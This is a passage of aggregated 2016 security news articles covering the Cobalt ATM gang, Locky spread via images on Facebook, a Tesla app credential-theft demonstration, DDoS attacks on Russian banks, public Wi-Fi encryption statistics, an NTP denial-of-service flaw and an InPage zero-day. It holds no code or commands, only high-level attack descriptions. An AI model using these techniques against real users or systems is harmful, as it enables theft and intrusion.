“Criminals send emails with attachments containing exploits and password-protected archives with executable files. In the attacks, phishing emails were sent from virtual servers, which had installed an anonymous mailing script “yaPosylalka v.2.0” (another name of the service is “alexusMailer v2.0”) developed by Russian-speaking cyber-criminals.” continues Group-IB.

The criminal gang use Cobalt Strike, a legitimate program designed to perform penetration testing and the Mimikatz tool to compromise domain and local accounts.

cobalt-strike-gang jackpotting

The researchers from Group-IB believe that Cobalt gang is linked to Buhtrap,

“Group-IB specialists believe that just after the arrest of the Buhtrap group in May their botnet was sold to other criminals who are continuing its use to steal money from corporate accounts. That said, according to our analysis of Cobalt attacks on ATMs of Russian and European banks, the methods used by criminals to deliver phishing emails and obtain control over a domain controller are identical to those used by the Buhtrap group. Purportedly, at least a part of the Buhtrap group became Cobalt members, or more likely Buhtrap core members shifted their focus to attacks on ATMs. ” explains Group-IB.

I suggest the reading of the Group-IB report on the Cobalt gang, it is full of details that are very useful to prevent such kind of attacks.

ImageGate attack – How to spread malware via poisoned .JPG
25.11.2016 securityaffairs

Security experts from Checkpoint have discovered a new malware-based campaign through Facebook leveraging an image obfuscation trick dubbed ImageGate.
Security experts from Checkpoint have discovered a new malware-based campaign through Facebook. Crooks leverage an image obfuscation trick, dubbed ImageGate, to spread the Locky ransomware via Facebook. Experts highlighted that the image obfuscation trick is able to bypass Facebook’s security checks.
“Check Point researchers identified a new attack vector, named ImageGate, which embeds malware in image and graphic files. Furthermore, the researchers have discovered the hackers’ method of executing the malicious code within these images through social media applications such as Facebook and LinkedIn.” reads a blog post published by Checkpoint security.

Checkpoint hasn’t disclosed the details of the technique because it could still have a serious impact on popular web services, including Facebook and LinkedIn.

According to the researchers, the attackers have devised a method to embed malicious code into an image file and successfully upload it to the social media platform bypassing security controls. The attackers exploit a misconfiguration on the social media infrastructure to deliberately force their victims to download the image file. This results in infection of the users’ device as soon as the end-user clicks on the downloaded file.

“The attackers exploit a misconfiguration on the social media infrastructure to deliberately force their victims to download the image file. This results in infection of the users’ device as soon as the end-user clicks on the downloaded file.” continues the analysis of the ImageGate.

The technique is not considered insidious for tech-savvy users, anyway, it represents a serious threat for users that could be tricked into downloading and running unknown executables.
Researchers Roman Ziakin and Dikla Barda from Checkpoint published a video PoC to show how to exploit the issue by sending a .jpg image file through Facebook Messenger.

The attack requests user interaction, the victim must click the attachment, in response the target system generates a Windows save file prompt asking the victim for the save directory to which the.hta file will be downloaded. The victim is infected with the Locky ransomware by double-clicking the saved file.

ImageGate checkpoint-jpeg-ransomware

Waiting for the improvement of Facebook controls, users are advised to stay vigilant and avoid opening unsolicited messages.

Check Point recommends the following preventive measures:

If you have clicked on an image and your browser starts downloading a file, do not open it. Any social media website should display the picture without downloading any file.
Don’t open any image file with unusual extension (such as SVG, JS or HTA).
A few days ago, researchers announced the discovery of a new hacking campaign leveraging on Facebook Messenger to spread the Locky ransomware via SVG images.
The Locky Ransomware is spread via a downloader, experts noticed that it is able to bypass Facebook defense measures by pretending to be a harmless image file.

The campaign was first spotted during the weekend by the malware expert Bart Blaze and by the researchers Peter Kruse.

“Earlier today, a friend of mine notified me of something strange going on with his Facebook account; a message containing only an image (an .svg file in reality) had been sent automatically, effectively bypassing Facebook’s file extension filter:” wrote Bart Blaze in a blog post.

When the victim accesses the malicious SVG file it will be directed to a website that appears to be YouTube in design only, but once the page is loaded, the victim is asked to install a codec in order to play the video that is shown on the page.

“A website purporting to be Youtube, wih a video from Facebook – of course, you needed to install an additional extension to view it :)” continues Bart Blaze.

If the victim installs the Chrome extension as requested on the page, the attack is this spread further via Facebook Messenger. The experts observed that sometimes the malicious Chrome extension installs the Nemucod downloader, which launches the Locky ransomware attack.

How to steal a Tesla car by hacking the mobile app

25.11.2016 securityaffairs Hacking

A group of researchers from the security firm Promon has demonstrated how cyber criminals could take control of the Tesla Car and steal it.
A group of security experts from security firm Promon has demonstrated how to exploit the Tesla app (for both Android and iOS) to locate, unlock and steal a Tesla Model S. The hackers used a laptop to remotely control the vehicle as demonstrated in the following video PoC.

“Our researchers have demonstrated that because of lack of security in the Tesla smartphone app, cyber criminals could take control of the company’s vehicles, to the point where they can track and locate the car in real-time, and unlock and drive the car away unhindered.” reada a blog post published by the Promon firm.

tesla car

The Tesla app implements numerous functionalities, it allows to check the battery level, locate the car, set the climate control and flash the lights.

The app performs the operations by sending an HTTP request to the Tesla server, these requests leverage an OAuth token for the authentication. The token is obtained by the users once he completed the authentication through username and password.

The experts noticed that the first time the user logs into the Tesla app, the mobile device receives a token that is stored in cleartext in a file in the app’s sandbox folder. Every time the app is restarted, the token is read and used for subsequent requests.

Attackers can steal it to impersonate the victim and access to the vehicle.

“In our tests, this token was valid for 90 days, meaning that the user has to re-enter his username and password once in a while. Stealing this token enables an attacker to locate the car and open its doors. In order to enable keyless driving, the password is required as well. Because of that, the hack focused on obtaining the username and password.” continues the analysis.

There are several methods to steal the login credentials, the hackers in their test used a modified Tesla app that includes the code to steal the username and password and send to an attacker.

In order to replace the Tesla app and manipulate the token, the attackers used a privilege escalation attack.

When the Tesla car owner connects to the bogus Wi-Fi hotspot and visits a web page, he is redirected to a captive portal that displays an advertisement targeting Tesla owners.

“In this example, an app was advertised that offers the Tesla owner a free meal at the nearby restaurant. When the Tesla owner then clicks on the advertisement, he is redirected to the Google Play store where the malicious app is displayed.” states the experts.

Once the Tesla owner has installed and started the malicious app, it will then gain root permissions and replace the legitimate Tesla app. When the user starts the app the next time, he will be prompted to provide his login credentials that the Tesla app will send back to the attacker.

The attackers have to trick the Tesla owner into installing this malicious app, for example through a phishing attack.

In a first step, the hackers have to convince the owner to download a malicious app onto their Smartphone. The hackers set up a free and open Wi-Fi hotspot in a proximity of a Tesla charging station, which offers a free burger to Tesla owners who download a special app. Of course, the attackers could use various incentives to trick users into downloading the malicious app.

“At this point the target knows nothing about the free burger app’s true intentions, but now the hackers have access to the Tesla app, they can track the car. Once parked up for the night, they can track down the car, instruct it to unlock (a feature of the app), then enable ‘keyless driving’ mode. Created by Tesla, this feature lets Tesla owners remotely unlock and start their cars by entering a password; this can come in handy when asking a neighbour to move the car to a different parking space while you are on holiday, for example.”

It is important to highlight that the hack isn’t a related to a flaw in Tesla car, a Tesla spokesperson told IBTimes UK that the report does not demonstrate any Tesla-specific vulnerabilities.

“Mobile-focused criminals are more skilled than ever before, and are using a lack of security in mobile apps as an increasingly lucrative source of revenue.” said Tom Lysemose Hansen, founder and chief technology officer of Promon.

“Remotely controlling and stealing Tesla cars is a particularly dangerous example of just what can be done, but in theory any app without the necessary protection in place could be affected.”

Caribbean scuba diving with IT-security in mind
25.11.2016 Kaspersky Security
Dare to submit your research proposal before December 1, 2016 to dive into undiscovered and uncharted cybercrimes, hacks, espionage and much more at the Security Analyst Summit – April 2-6, 2017 on the Caribbean island of St. Maarten.

There are four months left before Kaspersky Lab’s Security Analyst Summit on the Caribbean Island of St Maarten, an invitation-only conference. If you still haven’t submitted your individual proposal, you’d better hurry up. There’s only one week left before the SAS17 program committee will start evaluating the abstracts. The summit will welcome those with new studies and tools, vulnerability reports, creative ideas, concepts or their results; insights into nation state cyber-espionage and government surveillance; research into attacks against financial institutions and critical infrastructure; mobile systems the IoT cyber risk landscape observations.

You’ll join the leading voices in the IT security industry – the chosen few – for knowledge and information sharing: senior executives from business organizations, global law enforcement agencies and CERTs, independent researchers and journalists. Previous events were joined by members of leading global companies, such as Samsung, Adobe, Microsoft, BlackBerry, CISCO, Boeing, Interpol, the World Bank, Team Cymru, The ShadowServer Foundation, ICSA Labs and Fidelis Cybersecurity Solutions. And every year SAS proves that IT security has no borders.

Requirements for submissions:

Individual proposals should be no more than 350 words in length. SAS has a ground rule: nobody gets to speak from the stage for more than 30 minutes — this is the longest duration allowed for a keynote presentation — while everyone else gets 20 minutes maximum.
Proposals should include the title of the paper and should clearly spell out the focus and goal of the presentation.
The deadline for submissions is December 1, 2016.
You can send your abstract directly to The Program committee consists of six independent members, who evaluate the papers separately. They are Kaspersky Lab and external experts who share the SAS core value: uncompromising research. Have you been good this year? Santa The program committee will check soon.

Submit your abstract, find SPF20+ sunscreen, join the SAS family, follow @KasperskySAS and see how much fun it is — SAS2014, SAS2015 and SAS2016!

DDoS attack on the Russian banks: what the traffic data showed
25.11.2016 Kaspersky 
From November 8 to 12, websites of some of the largest Russian banks fell victim to heavy DDoS attacks. Initially, it was no indication of anything unusual – all well-known banks get attacked from time to time – but further developments have evolved in the manner that allowed us to suggest a high level of organization in regards to the series of attacks.

The first attacks that took place on November 8 affected two banks, but already at 4:00 pm Moscow time, similar attacks struck three more banks. A little later, a fourth bank was attacked.

On November 9 at 3 am, the attacks stopped for a while only to commence again in the evening with an attack on yet another bank. At approximately 5 am on November 10, a new wave of attacks occurred.

The largest number of attacks took place between 5 and 8 am on November 11 when, within the space of 10 minutes, eleven attacks occurred, which targeted various objects, namely, corporate websites of banks and online banking systems. All attacks lasted approximately one hour and were similar to the attacks registered in the previous days.

In the days to follow, no new attacks occurred, but some of the previously launched attacks continued until the morning of November 14.

Kaspersky Lab received first-hand information as events unfolded: some of the banks that were attacked are our customers, and they promptly switched their traffic to Kaspersky DDoS Prevention centers with a few more joining after events had started. This provided the analysts of Kaspersky Lab access to the patterns of the attacks and gave them an opportunity to draw a number of conclusions about their nature.

Attackers used combinations of various attack methods. They applied SYN Flood that exhausts operating system resources, as well as HTTP/HTTPS Flood that overloads the target Web server.
The longest attack in the series lasted 4 days 6 hours and 34 minutes;
The peak power of the attack was 660 thousand requests per second, while the average load on a corporate website of a major bank during business hours rarely exceeds 1 thousand requests per second;
A few botnets “specializing” in different types of attacks participated in the attack. Approximately 24 thousand unique bots have been blocked;
The traffic analysis showed that the leads pointing to Mirai, which prematurely appeared in the press, were not substantiated: one of the botnets was indeed built on the basis of IoT devices, but a different bot was used.
Bots that participated in the attacks are located in 30 different countries. More than half of them are in the United States, India, Taiwan and Israel.
The most powerful attacks started when it was early morning in Moscow, which seems illogical at first glance – the number of visitors to the target websites of banks is low at this time of day. This can be attributed to feeling out the target: the attackers started loading the websites with relatively simple SYN Flood and HTTP Flood attacks, thereby determining the possibilities of the protection systems to filter packets of trash traffic. The small number of legitimate visitors enabled them to quite accurately determine the frequency of requests necessary to create a denial of service situation.

Attacks against the banks protected by Kaspersky DDoS Prevention were not successful. Having recognized this, the attackers began to act in accordance with a more complex and demanding procedure – via HTTPS requests, and in some cases transferring the focus of the attacks onto Internet banking systems. Since the traffic of an HTTPS session is encrypted, it is impossible to analyze and filter it when located outside of the affected network. Thanks to the ability to analyze the traffic at the customer site (for this purpose, a separate “sensor” component is used), we received the statistical parameters of requests that were used to generate the filtering parameters directly in the cloud. In addition, the results of the analysis were forwarded to the IT services of the banks, which, if necessary, successfully generated counteraction measures on their side.

The carefully thought-out tactics, use of combined methodologies and scale of the event suggest a high level of organization among the attackers – the “job” was done by professionals. In regards to one of the banks, after all attacks were successfully dealt with, an elaborate attack method against the application level that took advantage of the web server vulnerability was used. This also points to the attackers being highly qualified.

It is difficult to say what the aims of the series of attacks were: it may have been blackmail, diverting attention from a hacking attack against banking systems, or political hacktivism. However, the fact that the attackers targeted the banks’ corporate websites first, and only then switched to remote maintenance systems if they were unsuccessful, allows us to conclude that the organizers were more interested in publicity rather than doing real damage to the financial institutions.

To a certain extent, our findings correlate with the reports that appeared in the press referring to the attacks being ordered from a certain DDoS service. According to its owner, the persons who ordered the attacks were unhappy with the influence that Russia allegedly had on the US Presidential election and the websites of major Russian banks were selected as high-profile targets whose operational difficulties would definitely be noticed.

Research on unsecured Wi-Fi networks across the world
25.11.2016 Kaspersky Safety
The very nature of wireless Wi-Fi networks means that hackers or criminals simply need to be located near an access point in order to eavesdrop and intercept network traffic. Poorly configured access point encryption or services that allow data to be sent without any encryption pose a serious threat to user data.

Confidential data can be protected by encrypting traffic at wireless access points. In fact, this method of protection is now considered essential for all Wi-Fi networks. But what actually happens in practice? Is traffic always encrypted on public Wi-Fi networks? How does the situation differ from country to country? Kaspersky Security Network statistics can answer all these questions. We compared the situation with Wi-Fi traffic encryption in different countries using data from our threat database. We counted the number of reliable and unreliable networks in each country that has more than 10 thousand access points known to us (this obviously excludes Antarctica and other regions where there is not enough data to draw any conclusions).

Security of Wireless Networks

Using statistics from Kaspersky Security Network (KSN), we analyzed data from across the world for almost 32 million Wi-Fi hotspots accessed by the wireless adapters of KSN users.


Encryption type used in public Wi-Fi hotspots across the world

Approximately 24.7% of Wi-Fi hotspots in the world do not use any encryption at all. This basically means that by using an antenna capable of sending and receiving data at 2.4 GHz, any individual located near an access point can easily intercept and store all user traffic and then browse it for data they are interested in. Fortunately, modern online banking systems and messengers do not transfer unencrypted data. But this is the only thing that prevents users of Wi-Fi networks with unencrypted traffic from revealing their passwords and other essential data when using an unsecure access point.

The WEP (Wired Equivalent Privacy) protocol for encryption of data transferred over Wi-Fi is used by approximately 3.1% of all analyzed access points. The protocol was the first to be created, quite a long time ago, and is now completely unreliable – it would take hackers just a few minutes to crack it. From a data security point of view, using WEP is not much different from using open networks. This protocol is being relegated to oblivion everywhere, but as we see from the chart above, it can still be found in use.

Around three-quarters of all access points use encryption based on the Wi-Fi Protected Access (WPA) protocol family. The protocols from this family are currently the most secure. The effort required to hack WPA depends on its settings, including the complexity of the password set by the hotspot owner. It is worth noting that an attempt to decipher traffic from “personal” (WPA-Personal, PSK authentication) wireless networks (with public access points) can be made by intercepting the handshakes between the access point and the device at the beginning of the session. “Corporate” versions are protected from this sort of interception because they use internal company authorization. When it comes to “personal” WPA2 attacks, the situation is similar to that of WPA and mostly depends on the strength of the password set by the hotspot owner.

It is only fair to note that during a standard attack on a Wi-Fi access point, a personal computer can generate from 50 to 300 keys per second on average. If the encryption key is strong, it will take years to hack it. Still, no one can guarantee that the key used at a cafe will be secure and that the attacker will have nothing but a PC at their disposal.

Overall, it can be said that today’s WPA/WPA2 “non-enterprise” versions are reasonably, but not absolutely, secure. In particular, they allow brute-force and dictionary attacks. There are ready-to-use publicly available tools (aircrack-ng and similar software) for performing such attacks, as well as a large number of manuals.


Research on unsecured Wi-Fi networks across the world

Share of Wi-Fi hotspots that use unreliable WEP or do not encrypt data (by country)

We would like to note that the five countries with the highest proportion of unsecured connections include Korea (47.9% of unsecured Wi-Fi access points), while France (40.14%) and the US (39.31%) rate 9th and 12th respectively in the list.

Germany appears to be the most secure among Western European countries, with 84.91% of access points secured by WPA/WPA2 protocol encryption.


Share of Wi-Fi hotspots that use WPA/WPA2 (by country)

However, even when using an encrypted connection, you should not completely rely upon this security measure. There are several scenarios that could compromise even well-encrypted network traffic. These include fake access points with names that duplicate or mimic real ones (for example, TrainStation_Free or TrainStation Free) and compromised routers forwarding traffic without encryption to attackers (malware tools that infect such devices are already “in the wild”). At any rate, taking care of your own security is a good idea.

Recommendations for Users

There are several simple rules that help protect personal data when using open Wi-Fi networks in cafes, hotels, airports, and other public places.

Do not trust networks that are not password-protected.
Even if a network requests a password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection with the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by employees of the establishment.
To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend disabling automatic connection to existing Wi-Fi networks too.
If you are not 100% sure the wireless network you are using is secure, but you still need to connect to the internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely not perform any online banking operations or enter your bank card details anywhere.
To avoid being a target for cybercriminals, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. It is recommended to enable this option when visiting any websites you think may lack the necessary protection.
If possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning criminals won’t be able to read your data, even if they gain access to them.
And, of course, you should use dedicated security solutions. They inform users about any potential dangers when connecting to a suspicious Wi-Fi network and prevent any passwords or other confidential data from being compromised if there is a threat.
One example of a dedicated solution is the Secure Connection tool included in the latest versions of Kaspersky Internet Security and Kaspersky Total Security. This module protects users connected to Wi-Fi networks by providing a secure encrypted connection channel. Secure Connection can be launched manually or, depending on the settings, activated automatically when connecting to public Wi-Fi networks, when navigating to online banking and payment systems or online stores, and when communicating online (mail services, social networks, etc.).

Microsoft Shares Telemetry Data Collected from Windows 10 Users with 3rd-Party
24.11.2016 thehackernews Hacking
Cyber security is a major challenge in today's world, as cyber attacks have become more automated and difficult to detect, where traditional cyber security practices and systems are no longer sufficient to protect businesses, governments, and other organizations.
In past few years, Artificial Intelligence and Machine Learning had made a name for itself in the field of cyber security, helping IT and security professionals more efficiently and quickly identify risks and anticipate problems before they occur.
The good news is that if you are a Windows 10 user, Microsoft will now offer you a machine learning based threat intelligence feature via its inbuilt Windows security service, which will improve the security capabilities available on Windows 10 devices.
But, the bad news is that it is not free.
The company is offering this "differentiated intelligence" feature on its newly added service to Windows 10, dubbed Windows Defender Advanced Threat Protection (WDATP), which helps enterprises detect, investigate, and respond to advanced attacks on their networks.
This becomes possible after Microsoft recently signed a deal with FireEye that integrates the security vendor's iSIGHT Threat Intelligence into Windows Defender Advanced Threat Protection.
As part of the partnership, Microsoft will give FireEye access to all the telemetry data from every device running Windows 10, Australian website ARN reports.
"FireEye has invested in nation-state grade threat intelligence, and we are strategically partnering with industry leaders to operationalize this high-quality intel," Ken Gonzalez, FireEye's Vice President of Corporate Development, said in the official press release.
"By working with Microsoft, we’re able to offer differentiated threat intelligence within WDATP and together help make organizations more secure."
It's no secret that Windows 10 collects all sorts of usage information on users and sends them back to Microsoft, which then uses this telemetry data to help identify security issues, fix problems and improve the quality of its operating system.
This telemetry data includes information on the device running Windows 10, a list of installed apps, crash dumps, and other statistics from devices powered by its latest operating system.
However, this Microsoft's data mining capability also raised some privacy concerns among Windows users.
This newly-signed deal with FireEye is the first time that Microsoft has publicly agreed to share telemetry data of Windows 10 users with a third-party, which is definitely worrying for many users.
At this moment, the official press release says nothing about Microsoft providing FireEye with access to data collected from Windows 10 users.
Microsoft has yet to comment on this matter.

FBI Hacked into 8,000 Computers in 120 Countries Using A Single Warrant
24.11.2016 thehackernews BigBrothers
The FBI hacked into more than 8,000 computers in 120 different countries with just a single warrant during an investigation into a dark web child pornography website, according to a newly published court filings.
This FBI's mass hacking campaign is related to the high-profile child pornography Playpen case and represents the largest law enforcement hacking campaign known to date.
The warrant was initially issued in February 2015 when the FBI seized the Playpen site and set up a sting operation on the dark web site, in which the agency deployed malware to obtain IP addresses from alleged site's visitors.
The piece of malware used by the FBI is known as a Network Investigative Technique (NIT). The malware was used for at least 13 days to break into the computer of users who visited certain threads on Playpen and then sent their IP addresses back to the bureau.
Earlier this year, court documents related to the Playpen case revealed that the FBI hacked over 1,000 alleged visitors of Playpen in the U.S. using a single warrant, along with computers in Australia, Chile, Colombia, Austria, Denmark, Greece, the UK, Turkey, and Norway during the investigation.
However, the new federal court hearing transcript from a related case reveals that the hack went much further farther and wider than previously believed and that the bureau actually hacked into more than 8,000 users' computers across 120 different countries.
"We have never, in our nation's history as far as I can tell, seen a warrant so utterly sweeping," federal public defender Colin Fieman said in a court hearing at the end of October, according to the transcript.
According to the transcript, the FBI also hacked what has been described as a "satellite provider." "So now we are into outer space as well," Fieman said.
"The fact that a single magistrate judge could authorise the FBI to hack 8,000 people in 120 countries is truly terrifying," Christopher Soghoian, a principal technologist at the American Civil Liberties Union (ACLU), told Motherboard.
The major controversy surrounding the Playpen case has been that Virginia-based US Magistrate Judge Theresa C. Buchanan who signed the warrant did not have the authority to authorize such searches.
The fact is that the magistrate judges are a more junior type of judges who don't actually have jurisdiction to issue warrants outside their own districts. Only more senior federal judges, known as district judges, have the authority to issue such warrants under Rule 41.
However, this would likely change with the changes introduced to the Rule 41 of the Federal Rules of Criminal Procedure by the US Department of Justice.
Changes to Rule 41 will Further Expand FBI's Mass Hacking Capabilities
The changes to Rule 41 will grant the FBI much greater powers to hack into any computer within the country, and perhaps anywhere in the world, with just a single search warrant authorized by any US judge (even magistrate judges).
The changes in this rule are set to take effect on December 1, 2016.
"The US government wants to use an obscure procedure—amending a federal rule known as Rule 41— to radically expand their authority to hack," the Electronic Frontier Foundation (EFF) said. "The changes to Rule 41 would make it easier for them to break into our computers, take data, and engage in remote surveillance."
However, the DoJ further defended the changes to Rule 41 in a Monday blog post.
"We believe technology shouldn't create a lawless zone merely because a procedural rule has not kept up with the times," writes Assistant Attorney General Leslie R. Caldwell of the Criminal Division.
If take into effect, privacy activists and cybersecurity experts believe that the US law enforcement will most likely use the changes to Rule 41 to further expand their capabilities of mass hacking techniques.

Antivirus Firm Kaspersky launches Its Own Secure Operating System
24.11.2016 thehackernews Safety
The popular cyber security and antivirus company Kaspersky has unveiled its new hack-proof operating system: Kaspersky OS.
The new operating system has been in development for last 14 years and has chosen to design from scratch rather than relying on Linux.
Kaspersky OS makes its debut on a Kraftway Layer 3 Switch, CEO Eugene Kaspersky says in his blog post, without revealing many details about its new operating system.
The Layer of 3-switch is the very first tool for running the Kaspersky OS, which is designed for networks with extreme requirements for data security and aimed at critical infrastructure and Internet of Things (IoT) devices.
What's new in Kaspersky OS than others?
Kaspersky OS is based on Microkernel Architecture: The new secure OS is based on microkernel architecture that enables users to customize their own operating system accordingly.
So, depending on a user's specific requirements, Kaspersky OS can be designed by using different modifications blocks of the operating system.
Kaspersky OS is non-Linux: Yes, one of the three major distinctive features of the new OS mentioned by Kaspersky is that the GUI-less operating system has been constructed from scratch and does not contain "even the slightest smell of Linux."
"All the popular operating systems are not designed with security in mind, so it is simpler and safer to start from the ground up and do everything correctly. Which is just what we did," says Kaspersky.
But what makes Kaspersky OS Hack-Proof?
It is the operating system's inbuilt security system. Yes, Kaspersky OS inbuilt security system has the ability to control the behavior of applications and the OS modules.
Kaspersky OS claims itself as practically unhackable OS, because for gaining unauthorized access, any hacker would need to break the digital signature of an account holder, which is possible only with a quantum computer.
"In order to hack this platform a cyber-baddie would need to break the digital signature, which – anytime before the introduction of quantum computers – would be exorbitantly expensive," says Kaspersky.
Kaspersky talked about the recent DDoS attacks that affected numerous websites in past few months. He guaranteed that Kaspersky OS would protect devices, such as industrial control systems, SCADA or ICS, and IoTs, from cyber attacks.
The most severe one was the recent massive DDoS attack on Dyn's DNS servers, which knock down popular sites like Amazon and Twitter. The attack was carried out by Mirai botnets that had infected smart devices like security cameras.
So, Kaspersky says it is mandatory to protect the IoT and other critical infrastructure (like industry, transport, and telecoms) from IT threats.
"I also hope it's clear that it's better – no matter how difficult – to build IoT/infrastructure devices from the very beginning in such a way that hacking them is practically impossible. Indeed, that is a fundamental goal with Kaspersky OS," he says.
More details about Kaspersky's secure operating system is coming soon. Stay Tuned!

Personal data of 134,000 United States Navy sailors leaked
24.11.2016 securityaffairs Incindent

Personal Data belonging to 134,386 United States Navy current and former sailors were leaked. NCIS and HPE are investigating the case.
The United States Navy has confirmed that the personal data of 134,386 current and former employees were leaked.

Names and social security numbers of the internal staff were stored in a laptop used by a Hewlett Packard Enterprise Services staffer that was compromised.

The Naval Criminal Investigative Service (NCIS) and HPE who are investigating the incident discovered that “unknown individuals” accessed the personal data of the United States Navy employees.

“Oct. 27, 2016, the Navy was notified by Hewlett Packard Enterprise Services (HPES) that one of the company’s laptops operated by their employee supporting a Navy contract was reported as compromised.” reads the Security Breach Notification of Sailors’ PII.

“After analysis by HPES and a continuing Naval Criminal Investigative Service (NCIS) investigation, it was determined Nov. 22, 2016, that sensitive information, including the names and Social Security Numbers (SSNs) of 134,386 current and former Sailors were accessed by unknown individuals.”

United States Navy sailors-leaked

The US Navy did not disclose details of the incident and there is no evidence that exposed data were abused by the unknown attackers.

It is still unclear if the laptop was lost, stolen or if a malware exfiltrated data on its hard disk.

“We are in the early stages of investigating and are working quickly to identify and take care of those affected by this breach,” naval personnel chief Vice Admiral Robert Burke says.

“The Navy takes this incident extremely seriously – this is a matter of trust for our sailors.”

The United States Navy will notify employees affected by the security breach in “coming weeks.”

The Navy is reviewing credit monitoring service options for affected people.

CVE-2016-9311 NTP DoS Exploit Released, update your Windows server asap
24.11.2016 securityaffairs

A researcher released a PoC exploit for the cve-2016-9311 flaw that can cause the crash of the NTP daemon and triggers a DoS condition on Windows systems.
The NTP protocol could be exploited by hackers as an attack vector. The NTP is a networking protocol widely used for the clock synchronization purpose between systems over packet-switched, variable-latency data networks.

In the past experts reported a vulnerability in the NTP protocol that could be exploited by attackers to power massive DDoS attacks. In April 2014 the largest ever (400Gbps) Distributed Denial of Service NTP Amplification attack hits Europe servers of anti-DDoS protection firm Cloudfare.

This week, the Network Time Foundation has fixed a flaw, tracked as CVE-2016-9311, that affects’s nptd versions prior to 4.2.8p9, except the ntp-4.3.94.
The flaw was discovered by the security researcher Magnus Stubman, it can be exploited to cause the crash of the NTP daemon and triggers a denial-of-service (DoS) condition on Windows systems.

The CVE-2016-9311 vulnerability was solved with the release of NTP 4.2.8p9, the security update addresses a total of 40 security patches, bug fixes, and improvements.

A patch was developed and sent to Stubman on 29th September. The researcher acknowledged the fix a couple of days later and then publicly disclosed the flaw.

“The vulnerability allows unauthenticated users to crash ntpd with a single malformed UDP packet, which causes a null pointer dereference,” Stubman wrote in an advisory published Monday.

“CWE-476: NULL Pointer Dereference – CVE-2016-9311

“According to, “ntpd does not enable trap service by default. If trap service has been explicitly enabled, an attacker can send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. Affects Windows only.” reads the Vulnerability Note VU#633847 issued by the CERT at the Software Engineering Institute at Carnegie Mellon University.

Stubman released a PoC exploit that can cause the crash of the NTP daemon and triggers a denial-of-service (DoS) condition on Windows systems. This means that theoretically everyone could crash a server with just a single specifically crafted packet.

“NTP users are strongly urged to take immediate action to ensure that their NTP daemons are not susceptible to being used in distributed denial-of-service (DDoS) attacks. Please also take this opportunity to defeat denial-of-service attacks by implementing Ingress and Egress filtering through BCP38. ntp-4.2.8p9 was released on 21 November 2016 and addresses 1 high- (Windows only), 2 medium-, 2 medium-/low-, and 5 low-severity security issues, 28 bugfixes, and contains other improvements over 4.2.8p8.

Please see the NTP Security Notice for vulnerability and mitigation details.” reads the security notice.

Giving a close look at the NTP security notice we can find another critical issue, a trap-crash vulnerability reported by the expert Matthew Van Gundy from Cisco.

“If trap service has been explicitly enabled, an attacker can send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service,” reads the advisory.

The CERT at the Software Engineering Institute at Carnegie Mellon University has also listed some vendors that could be affected by the bugs.

Administrators urge to patch their NTP implementations as soon as possible due to the availability of the PoC exploit code.

Speake(a)r attack allows to spy on users through typical headphones
24.11.2016 securityaffairs Attack

Speake(a)r attack – Security researchers have demonstrated how to turn headphones into a microphone to spy on all target conversations
A group of security researchers at Ben Gurion University have demonstrated that it is possible to turn headphones into a microphone to spy on all target conversations in the background without raising suspicious.

The team of researchers is famous for having devised several methods to exfiltrate data from air-gapped networks.

The research team has developed a proof-of-concept malware, dubbed Speake(a)r, that allows to use typical headphones as microphones and record all surrounding conversations, such as a spying device.

The researchers published technical details of the Speake(a)r attack in the research paper titled “Speake(a)r: Turn Speakers to Microphones for Fun and Profit.”

The technique to use headphones as microphones is not a novelty, many other groups have devised such kind of techniques.

This specific research is very interesting because it managed to switch an output channel of the audio card on any laptop, running either Windows or Mac OS, to an input signal and then recording the sound without any dedicated microphone channel from as far as 20 feet away.

The Speake(a)r malware exploits a computer to record audio even when the microphone is disabled or disconnected from the computer.

“People don’t think about this privacy vulnerability,” explained the lead researcher Mordechai Guri “Even if you remove your computer’s microphone, if you use headphones you can be recorded.”


Speak (a)r captures vibrations in the air through the headphones, then converts them to electromagnetic signals, alters the internal functions of audio jacks, and then switches input jacks (used by microphones) to output jacks (used for speakers and headphones).

With this technique, a hacker is able to record audio, though at a lower quality, from computers with a disabled microphone. The method also works if users remove any existing audio component from the computer.

The method devised by the experts leverages on a feature of Realtek audio codec chips that silently “retask” the computer’s output channel as an input channel silently.

We have to consider that RealTek chips are being used on the majority of computers today, so the Speake(a)r malware works on practically any machine. According to the researchers, this issue is not easy to fix, it is necessary to redesign and replace the chip exploited by the malware.

“This is the real vulnerability,” added Guri. “It’s what makes almost every computer today vulnerable to this type of attack.”

The researchers published technical details of the Speake(a)r attack in the research paper titled “Speake(a)r: Turn Speakers to Microphones for Fun and Profit.

InPage zero-day exploit used to attack financial institutions in Asia
24.11.2016 Kaspersky Vulnerebility
In September 2016, while researching a new wave of attacks, we found an interesting target which appeared to constantly receive spearphishes, a practice we commonly describe as a “magnet of threats”. Among all the attacks received by this magnet of threats, which included various older Office exploits such as CVE-2012-0158, one of them attracted our attention. This file, which was also uploaded to a multiscanner service in September 2016, had an extension that we were unfamiliar with – “.inp”. Further investigation revealed this was an InPage document. InPage, in case you are wondering, is publishing and text processing software, mostly popular with Urdu and Arabic speaking users.


InPage user groups from vendor official site

Since no exploits for InPage have previously been mentioned in public, we took a closer look to see if the document was malicious or not. Further analysis indicated the file contained shellcode, which appeared to decrypt itself and further decrypt an EXE file embedded in the document. The shellcode appeared to trigger on several versions of InPage. We don’t observe any public mentions of such exploit so we consider it a zero-day. All our attempts to contact InPage so far have failed.

Discovery and analysis

InPage is an interesting vulnerable software selection as it’s widely used within the Indian Muslim population, as well as in Pakistan. This, of course, includes local mass-media and print shops, governmental and financial institutions (banks). If someone wants to deploy attack modules into regional press-related companies, an InPage exploit would work well.

Due to its wide range of technologies, it wasn’t perhaps surprising to see that Kaspersky Lab products already detect the exploit with the generic rule HEUR:Exploit.Win32.Generic. This detection is triggered by the presence of the shellcode inside a Microsoft Compound Storage file (OLE), which works extremely well for a wide category of Office-based exploits, going back to 2009.

The good news is that Kaspersky Lab users have been protected against this attack for quite some time – and the protection worked well in the past when it blocked a number of malicious InPage documents.

